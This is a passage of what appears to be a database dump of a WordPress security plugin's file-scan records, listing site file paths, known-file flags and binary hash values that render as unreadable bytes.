�S-��#Qf��7�l3h}|','',0,'?'),('n���0�9j�v8�\"','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/request.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_�s?8f,ؔa��','��ۂ5سq\'ԟ*�.F�Č�կ�ͻ�+\rSI�','',0,'?'),('n��ۗ��vXH)�','wp-includes/sodium_compat/src/Core32/Curve25519/README.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y��ϛ�vj��\n���','�S�x�^�V>m�!-�q���D�eV�����','',0,'?'),('o{`B\n��x5+��Y�','wp-content/themes/healing-touch/inc/about-themes.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k������EO�~6','�3}Q`E���ϧ�O�]$=�w����i��:�','',0,'?'),('o\'RD-��\0���o��','wp-content/plugins/wordfence/images/support.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Cl�$��r����n<.','��$�M��Ԯ�&���(ᩘs��^ Ϣ*N��','',0,'?'),('o1i�L5���z�$��7','wp-content/plugins/wordfence/modules/login-security/classes/model/compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�u1��\\�8���;#j-','P����|�l�_���Z��3z<NɧK���','',0,'?'),('oC�\"���Q���t��y','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/HChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��+�����%','�4!��H�:�6>�lE��Ec#���a{�A�{','',0,'?'),('oP�c����o�.�r','wp-includes/js/tinymce/skins/lightgray/img/object.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�rdP�E}u\n/M�A�� ','��#;!��I��.�>�uʍ�SV��m{|�e-','',0,'?'),('oS]�~(��7;�\r�','wp-includes/js/dist/shortcode.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ʼ�����|���U','��9j�Z�-�T�(�(�kC�����r�uS�','',0,'?'),('oZ0�������<c�0','wp-includes/SimplePie/IRI.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n��9,�zӄycE�','Ye��k����\Zk�t~�n4�&�����p#�Ӝ','',0,'?'),('o}�C܊8�E��G�','wp-content/plugins/wordfence/views/scanner/site-cleaning-high-sense.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','rW�+�`Akæ�V r','U���mְ�E2�e�Io�#�z^aŁ���$G�','',0,'?'),('o�j̄��C-#|E�','wp-content/plugins/wp-cerber/assets/flags/ag.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I�g(4e���j52^G','��2�M�`O���?iX�e�B�q����x��','',0,'?'),('o�jK�F>I��l>','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/fontawesome/font-awesome.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�/B�����P\"���=','z��1*�lN�\nT{e�L&��\0�2R$�]','',0,'?'),('o�w*�\nΛGҜ�]','wp-content/plugins/wordfence/modules/login-security/img/header.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p����]�j-����','8�����#̄(8��O�\"� +h\"Fb��','',0,'?'),('o㮚-�;?X:��pҡ','wp-trackback.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����ьWe=]!B��','��\'ߵ���3�M؞Ø��5���c�o�M�U�%','',0,'?'),('o���Y��څ��X�','wp-content/plugins/wordfence/images/flags.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W7� ��(�˿!�\Z7�','Bx�0%Ly�6���!��X\\z/<�n�6=\ZW�','',0,'?'),('o�[��n3u��ʹ�P5','wp-admin/options-general.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��O+�٢���%ڦS�','Y�*7:��!ȡ˦�Ak}���w��2��Z1','',0,'?'),('o���\n�09��L�','wp-content/themes/doctors/core/home/blocks/blog_grid/skin1/customizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\0)ljOp�E�i�','�a��\nJ�W��X�)�8���UC�l.~wt΅�','',0,'?'),('p��7u�L�_{2Û�','wp-includes/js/jquery/ui/draggable.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J���\\O��Љ/�Hp%','�N��B\0�!8\r���o? �)E�C>��','',0,'?'),('p\rAp��5��$A\"','wp-content/themes/healthcare/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ͻR���*��n�/','��!X�+%@<BY�+i���3=��z��ңD��,I','',0,'?'),('pN!Hl�:�Ɩ\Z�\\��','wp-content/themes/doctors/core/assets/js/owl.carousel.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��<��,n!nh��GF�','d�c��ԅg��w|{��HT4o��3]APY�','',0,'?'),('p�?وU���\0','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-cronjob-handler.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C�}�$c�{G�(�P','��H�M�c�6�v�H�@�EmO2\'5�n�ҬX��','',0,'?'),('p{\r�� �%>/�Z��:','wp-content/plugins/wordfence/views/scanner/issue-base.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m|�&vfƲ~��','�i\"��m�$�PyM����d�� ���S�','',0,'?'),('p�\0�����!J�','wp-content/themes/healthcare/admin/js/script.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','48��o�M��','Q� ����Ms�b��\"�͚���&�w\n�t�;','',0,'?'),('p:�,�`OlL�(�A','wp-content/plugins/wordfence/views/waf/waf-uninstall-success.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k�~�H���7�<�B��','\0!�F�E���KP��7�0��\n;6�}��$','',0,'?'),('pB���e�Gߴ^���R�','wp-content/plugins/wordfence/modules/login-security/css/jquery-ui.structure.min.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�)/4;�$۔�ެvi\\','�n���i��뗅�N�vX�7�Y]�����D','',0,'?'),('pM�j�۰��sԐ?�','wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-dimension-control.php',0,'_�q�����4u��yd','_�q�����4u��yd','^\'��\'D����I�8l.�F�~�����Jkȃ�Oe','',0,'?'),('pUy�a �b��va�;�8','wp-includes/js/comment-reply.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�F���D6����x�','!�x��G�����Go�Df�B8xXC�','',0,'?'),('pj�U��̃�ز���','wp-content/plugins/redirection/models/redirect.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'��U��S�m}eZq�-','��&�Q�:����L�p��Ȇ�0�ɪu��','',0,'?'),('p��.а��[ÍD�','wp-includes/deprecated.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���X�;|N.��S_d�?','S5�g���*����r����x�{��&','',0,'?'),('p��\\*e�\n\rψ��','wp-content/plugins/wordfence/modules/login-security/classes/controller/notices.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z�83�?w�����W','\r.l]\\) Z�q���p�]_^�u����J\n�%�','',0,'?'),('p�n��h��~Y�r�','wp-content/themes/doctors/core/includes/trunk/ds1/ds1_css.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@p Y���h�|\0��<','|��ߘ�Ӭ84i)����̼=T��^�����','',0,'?'),('p̓0�2@��PF�tk','wp-content/plugins/wordfence/views/common/unsubscribe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y:h3�>��a ݑ�4~','E�q����Tg��O>F-��O�(�IƚZ��z','',0,'?'),('pϧZq���tP_�HR�','wp-content/themes/advance/inc/kirki/includes/scripts/class-kirki-scripts-tooltips.php',0,':ۨ�+ӧ+��L�',':ۨ�+ӧ+��L�','ǕI{�+$�`o� �>�C�M�[\0B�\Z8y�','',0,'?'),('p�}G��J��$��x','wp-includes/block-supports/align.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v(\0����1�i�`','��=o�.�k�4�Ŋ*�P\\������[�','',0,'?'),('p����b�~�oBk�Z','wp-content/plugins/akismet/class.akismet.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��~<��p���k�',' �;\0[���FsY\ZΧ��`�Qx����\"�m','',0,'?'),('p��u�w��S�ɴ0�','wp-content/plugins/hello.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�E��t�5\0���P��w','f��s�� u�c����~���0b����I�&5)','',0,'?'),('qqC��$�����@','wp-content/plugins/wordfence/views/common/page-title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u3�^1!��Gѩ}:�L','8^!c�$u��w�y��)�+ &�&���<�','',0,'?'),('qs��A�t���d�\\','wp-includes/js/dist/warning.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@AUV����x��\0�','%|�l��U}}�@~�\\<��#��x�9�a\n��','',0,'?'),('q\"�co���>�2Rh�]','wp-admin/includes/plugin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�c��)��yf��t���','���!��������g|:ڧq�*օxɚI�t� ','',0,'?'),('qL���I�Lc�','wp-includes/class-wp-recovery-mode-link-service.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����}f/c�nx5','�k�������ޙ(Z��t�M\0��;�t\r','',0,'?'),('qh�665�y|�=�?S ','wp-includes/js/jquery/jquery.serialize-object.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*�D�B\ru�6����!','��`�RԶ�2ɀ�`��Mx��i�G�fz�C2�','',0,'?'),('qt��^�9�0=t�z','wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-radio-image-control.php',0,'\'�i=����V>���','\'�i=����V>���','\0Q�}����m�P��{���#�D�R���','',0,'?'),('q��f���EH�7�d�','wp-includes/css/dist/editor/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z���Ey��,��~','��t>\'�\"A�ˊ�� �QN��\Z�gH��','',0,'?'),('q�^�YD�t;ELN��\n','wp-content/plugins/all-in-one-wp-security-and-firewall/logs/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0�� ��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('q�ڀ\"NkvR ތ6\Z','wp-content/plugins/disable-gutenberg/inc/plugin-core.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h7���lj�ً����(','�c���>&�(KL\"8zm�<���\ZIwׄI�=��','',0,'?'),('q�s���ƞ�ù��','wp-includes/rest-api/endpoints/class-wp-rest-post-types-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����!�Й�~L�C��','֓�2ǟ��lq�~�<%Z����g����','',0,'?'),('q��F~IfD�ө� xZf','wp-content/plugins/wordfence/css/diff.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','܀g �� �$���`r�Q','��$��hEJ^54<$�ӭYc����&','',0,'?'),('q����R+�q�\Z�2�','wp-includes/js/dist/edit-post.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/�):����sL?&��','�I��R=E\Z��`֚m٪�p\Zt~�#�`I��','',0,'?'),('q�O��W��T��u','wp-content/themes/healthcare/menu/weblizar_nav_walker.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�D��e �.��S��','�u�\\��{���\\f�cT�09/�%�\'��?ڒc>�','',0,'?'),('q�0\\y*3�Q�>vJ�','wp-content/plugins/wp-cerber/assets/flags/tw.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ښ��� .�;���X','U��Ӥ�SQ���{�5�𐮆c-y��','',0,'?'),('q�0���������5','wp-includes/sodium_compat/src/Core32/SipHash.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5O&?��E� ��%','^%%�hT��,�����k2�Ȯn=n%:��','',0,'?'),('q��5@�*=�&��\\X�','wp-content/plugins/wordfence/lib/wfHelperBin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';��!�ȍ��4Q��X#','��չ%-�^�q��U�q�M��eY���','',0,'?'),('q�$\'6�e��-W]','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/PHP52/SplFixedArray.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nb�x ��BC��?���\Z','��e��C8�&\r����h\r��2w�(^Й�V\0','',0,'?'),('r[��s2<�����u','wp-content/themes/twentytwentyone/assets/sass/06-components/posts-and-pages.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g<Q�P�;�z��[Ѩɹ','����j�Qo���<>�\n��Y�����g1�b','',0,'?'),('r��h��v��Lk/��','wp-admin/network/upgrade.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�q#��ԑ��\Z;f��','��3PJݎ��Y��b�GqA��8o:?��>�','',0,'?'),('r\r�\\o�i��^\Zn�','wp-content/themes/regina-lite/inc/libraries/welcome-screen/assets/img/ajax-loader.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j�j~��Ս:��M��$','!�T��K���{>��N�[�\'��,DR���̅*','',0,'?'),('r$c��\'�O�uGь2','wp-content/themes/doctors/core/contents/loop_home/home.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K����&K�֕2u;�','V<�v:��M?�INs��PM4ev}�w��vz4�','',0,'?'),('r+zk;� 4��WI','wp-includes/js/tinymce/themes/modern/theme.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�(3�o�U�2ŝU�2�','�2.�pt�\"r�`)��\r.C�l�\\\Z��BIX','',0,'?'),('rI\0yg�E!���2\0C','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/503-lockout.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�P����mx�f�4 \"','���H&�(hn�U�-z$���&��Egj[�M�','',0,'?'),('rQc<e\rm\'��7S1','wp-content/themes/doctors/core/contents/loop_single/skin1/c-css.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b�m��*8��m�M6A','Z��-�/+�Y���9�jߏPc�ï*0&Hf','',0,'?'),('r_��YrL�8�;��8E','wp-content/plugins/wp-cerber/assets/flags/ua.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���V i��#Ʉ\r','�۽����,jI�7=3I�\0������\"�M7H','',0,'?'),('re��\'۷�11d��8�','wp-content/themes/twentytwentyone/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b/��RפH�{V���','2@:Uo�+�UJ7���˄�&yS���c�j��','',0,'?'),('rt�Ig[��;���?','wp-includes/sodium_compat/namespaced/Core/Salsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\rV�N�ck0�}/�Ճ�','n�K��kZ�� ���� N$ � EК���e�$','',0,'?'),('r��)����d��RD�2','wp-content/plugins/wordfence/js/wfdashboard.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Խ�P����`�{i�','=P�z�r���!�?w\Z�/d!��LӪ��1!�','',0,'?'),('r�(n՞���j��b\"','wp-admin/js/media.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ҋ$����(����','���sݝ���&��գʆ#�_�`�X','',0,'?'),('r��WI� \'�H� f~X','wp-content/themes/weblog/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(���G�;��d��','�y��\'�(�;DZ���&Ȩ�.6a�w���JG3','',0,'?'),('r��O�r\0�C<o�b#�j','wp-content/plugins/all-in-one-wp-security-and-firewall/wp-security.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V�ҵ�F��K�K��$��','���w�U��*S�������0ϙ�P7z�','',0,'?'),('r���J�7ә�Dpf�8[','wp-content/themes/vision-lite/content-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f��LYG\Z\\�\ZcJC�','�4�mͬ~���g;�\',� ?�O_� N�','',0,'?'),('r�3�e\\��,S�q','wp-includes/class-wp-block-supports.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}��C��ie�4���','�8r�ƻ�Iz�R��1L��u?-����','',0,'?'),('r�_�/��HG=�%�<�','wp-includes/images/arrow-pointer-blue-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%m�rތ]4�9c�','��{&DO�z��A�f�/��gá������A]~�(�','',0,'?'),('r�r�(J�g�(�y�t','wp-includes/js/mce-view.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2s�H��ّ;[��� s','��8`9ڰn�-.� H�Dp��k+�γ��bI','',0,'?'),('r�*�s_�\\���9x\'','wp-content/themes/doctors/core/home/blocks/info_box/skin1/css.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?~�m9�M�1)��C��','!F[�6n�#!}r��ߛ��y�6�S��Z��u�','',0,'?'),('r��4�:���@s�','wp-content/themes/wp-barrister/full-width-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')�!�P6�A[��','R}{���ub�/��U$��o~e�q]��W�A','',0,'?'),('r�jN�mM.s�d���F�','wp-content/plugins/redirection/matches/cookie.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','JE��|O��d4\0P�A','B�*%QIb��o:���n�zhf�`XJ[ J�','',0,'?'),('r�)�����e�l�','wp-includes/css/dist/list-reusable-blocks/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�b�j��u9)�\n6�5','gg(($C���(rw�H\n�O���D!\rl��a�','',0,'?'),('r��ʔQ��\'6�6��\\�','wp-content/themes/healing-touch/js/custom.customize.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\Z����`~#�\07�','�`���h�Y<�l$��ְ��������n','',0,'?'),('r��\n��b��#��','wp-admin/css/media-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�a���f�}��E\\','E�:�#��P�c;�&��T�$G@�\Zrp�J�iR','',0,'?'),('r�7��/y*�aڛP] 0','wp-content/plugins/wordfence/views/blocking/blocking-create.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�٥r��zż��S�5�','D{%WQ����Ȱ2����-\\�����l','',0,'?'),('s&�繗�DCl�s�H','wp-content/themes/twentytwentyone/assets/sass/05-blocks/heading/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������!�<�9�Ӫ','��:̶&E �\0@ؼ�k�P� �n2R�I�','',0,'?'),('s�As�Y����D]','wp-content/plugins/wordfence/views/scanner/options-group-advanced.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�P����Co���>~�','#�~���6��˞45���LW���V��^�','',0,'?'),('s�i4\r�t���N�','wp-content/themes/regina-lite/inc/customizer/assets/js/customizer.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�.ϫ,���4��ɘ�','\n)�:��9��2w�j۞���es+\n��E','',0,'?'),('s��s�?T���U��/','wp-content/themes/doctors/core/contents/loop_author/skin1/css.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�� ц��3�fE��','����B��XB{J����q�q~�?5$��6�','',0,'?'),('s��ӣJ���~��k','wp-content/plugins/akismet/views/stats.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�s�JJuw��&�R{��','w�ü}\Z�O�g��� f#�E�1g=g�Rz��F','',0,'?'),('s�E�Ξq�p�B���','wp-admin/css/widgets-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x[ʦ�]��M ��','Y�g_��~��\"��%��ٍ���[#u�دv�','',0,'?'),('s��(:ӣ$������\r','wp-content/themes/twentynineteen/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/�x̣���ۍJ��','�����X�e�����M�<!K��\0��ᆧ','',0,'?'),('s�]��P�f���\n','wp-content/themes/twentynineteen/sass/variables-site/_columns.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:�+<����>3���K','w�0�̃�|^�;�Ym����n�L��i2��4�','',0,'?'),('s�ŏU\'���e@�d�','wp-includes/js/tinymce/plugins/fullscreen/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ғ:�K�[�Iw\\��g�','`e�� �n��O���JM�%�N�hA�{gh�f','',0,'?'),('s��4�����R�X>O�','wp-content/plugins/wordfence/modules/login-security/img/ui-icons_777777_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h�^n=(��&��݂�N&','S��DIB�z�_-?(Y��pE�y�ƹA�','',0,'?'),('s��˱�Y*u���O�','wp-content/plugins/wordfence/vendor/composer/autoload_psr4.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*q��BIt�ӟA<\"','6qQ���`�d!cf��.�Bxq','',0,'?'),('s���*TV�1�oE','wp-includes/js/jquery/ui/effect-blind.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����{5���%�ko','��0ʟ\0`rz){쥵3�[��[q[��ٵ','',0,'?'),('s�C4M�*��*B�)�','wp-includes/css/wp-pointer.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','HB���v��}�d~�','�72�4����.���ҷCŧ�Z���;7Fr�b','',0,'?'),('t\r�[��Ձ9*5W�b��','wp-includes/block-patterns/text-two-columns.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��W�ۆe���9���!>','bP9���ޤyP���g��\"��Ę��\"V�','',0,'?'),('t�{*��aM��r̎','wp-content/plugins/wp-cerber/assets/flags/tt.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Wp}y����œ�_.�','D�qY\'�?t���}�u���t!��_r^��','',0,'?'),('t/�����Ji6WX��','wp-includes/class-wp-recovery-mode-cookie-service.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q�-�����*xrf�','�8�-�H0F�y���G����������Nj�','',0,'?'),('t2�yIF!a!j*�kM�%','wp-content/themes/vision-lite/front-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1)W�k�TέG��','��\"1�٧��̲%P_m�wY|v�^c�g�\"�','',0,'?'),('t6��O�\ra��Ȇ�f','wp-admin/js/plugin-install.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ct��ݦq�CI','�T�xY�q���*��sP�J�ƶ.���+ʩ�Z','',0,'?'),('t8����p�̋�z{jDp','wp-includes/css/buttons-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i��ԝ]z~c6���g6','�L�X橕f��\Z�tC5�i�fS�(�R�&�=�','',0,'?'),('tU�/Ds�Iڤ�st�','wp-includes/js/wp-auth-check.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*�L�A��`�2ڴ�Hd','O���f����s����0B��9��Z_��2','',0,'?'),('t[[�=�6u7;Y��T�','wp-content/plugins/wordfence/modules/login-security/classes/model/crypto.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4s[���lAc4�f���','ƺ�>�y�.~yK�^�)*f�����6F�','',0,'?'),('tm6ۗ�q���.��=j','wp-admin/css/colors/blue/colors.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','bq�9���\ngI�+','�(���%�$CkO\r����=0�d[qˡ�','',0,'?'),('tm�\n��GO \'�\Z','wp-includes/js/jquery/ui/mouse.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����IJi��\r���','�P��<\n��+�q� ��NJ�+��s���b���','',0,'?'),('t�����.�Õ�81�','wp-includes/random_compat/random_bytes_com_dotnet.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nM@<��A6�@!�Y��','.#�$.N�.��\\\"�Cuj�%H��EJֈ^a','',0,'?'),('u�6��4E~�:��','wp-content/plugins/wordfence/images/icons/working-indicator.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����VF���{N �\'G','�fX��RZ�|:O�b��=f�[y���5 ~ ','',0,'?'),('u!��+��\Z����','wp-includes/SimplePie/Cache/Redis.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o.*h�`|,{���mg','�Yj�q��O�L����1����v��|�b�}|U','',0,'?'),('u3۔�p���y���','wp-content/themes/advance/inc/kirki/assets/js/controls/color-palette.js',0,';\n!eO$2�`8�0]�}',';\n!eO$2�`8�0]�}','�E&�VM��>(O��?H-�/#biCB�W','',0,'?'),('ue�,\"\n �h�g.','wp-admin/css/colors/_mixins.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X`��oi�`Hx���C','���d�pe܊&�������������s-�','',0,'?'),('umU9Sej�F�q�\nrg','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-generic.php',0,'-����G�Q�','-����G�Q�',',®�%�4&ʐw�l�1(9g�c�����s','',0,'?'),('u����[������D','wp-content/plugins/wordfence/views/waf/waf-modal-wrapper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$��:o;J��\n���b','[d�%>��[�l�����[�,0o_IX>ڦ2�','',0,'?'),('u��Yf�CP��\"�bmF','wp-content/themes/healing-touch/images/slides/slider1.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ٹ��ު�.䤔Ơ','{�^pu��?��������R#����0�','',0,'?'),('u��I5q�#��,>�','wp-content/themes/twentytwentyone/assets/js/primary-navigation.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ɱ�\rA2���e','ʟ�]b���F��ң���^�Ex��D�','',0,'?'),('u��3!pA�f�)R�M�','wp-includes/js/tinymce/plugins/wpgallery/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��_�vQ8_�$�?��','<��A0�6kJX\nvA/��%O�-v_���\'p�A@ئ','',0,'?'),('u�m-O��\'ߝ�]�#','wp-includes/sodium_compat/src/SodiumException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�HDf��ae���z��R','㶜\\��L>L�N-@G\'��tmG��i��kR߮g\0','',0,'?'),('u�qg\Z\0�8�hԭ�\0�','wp-admin/custom-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��y����&�','�Θ�4��C�w@�Xdo��N=w���<~o�','',0,'?'),('u�:�z�2�DQ��4','wp-includes/blocks/tag-cloud.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@{�\Z9ڛ���S6��1','��1�ʪ���V�IT/���m�w/(\'��t�+�','',0,'?'),('u����\r�j�0S����','wp-content/themes/healing-touch/inc/custom-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e�K�g�Ɉ�=�<','�!�Q���;�Cሮ��v[�[�%M��','',0,'?'),('v\0�x��^)��>(yJ','wp-content/themes/wp-barrister/tag.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�0b��S��!�J$\'�','�$b_�\"b�1-C����]�Xl~6�����/�','',0,'?'),('vڴ����V���K��P','wp-includes/js/tinymce/skins/lightgray/fonts/tinymce.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���PNڡ\'f���','\r]�~[�������_˳�P�B�TA`��*,O','',0,'?'),('v�)F��~q���?b','wp-admin/includes/class-plugin-upgrader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\ZE)�-0�M�;���h','2ꦢ�3l\'k��c�{�=ߺ��$[��&Of��','',0,'?'),('vK;@�s�aU1;� ^�','wp-config.php',0,'�AL\'�Z����l�B�','�AL\'�Z����l�B�','L�S�\n�gE�A����hfN��ȾAW ��5�','',0,'?'),('vLM�.f���%OMR','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4�V+=?k�\r���','_����x:�nOsO�:d�\'\0�N=���k�','',0,'?'),('vM�m*&Z�`\'/b�+','wp-includes/js/jquery/ui/effect-puff.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��CH��w�d���֞','s� LMÖ�,sK���\Z~Q#�.0W�N׳_~','',0,'?'),('ve\\�l.�х{','wp-includes/js/dist/vendor/wp-polyfill-formdata.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�883������x��\r','��X�����r�q-��N)��nhl�L�$���','',0,'?'),('vi�fuP�0^�>d��','wp-includes/sodium_compat/namespaced/Core/ChaCha20/Ctx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��SG��˺��F���','[�(��R�������$��2o���t�b��','',0,'?'),('vw��@�H��z�F�','wp-admin/ms-admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�UjA�ڦYq�u�� 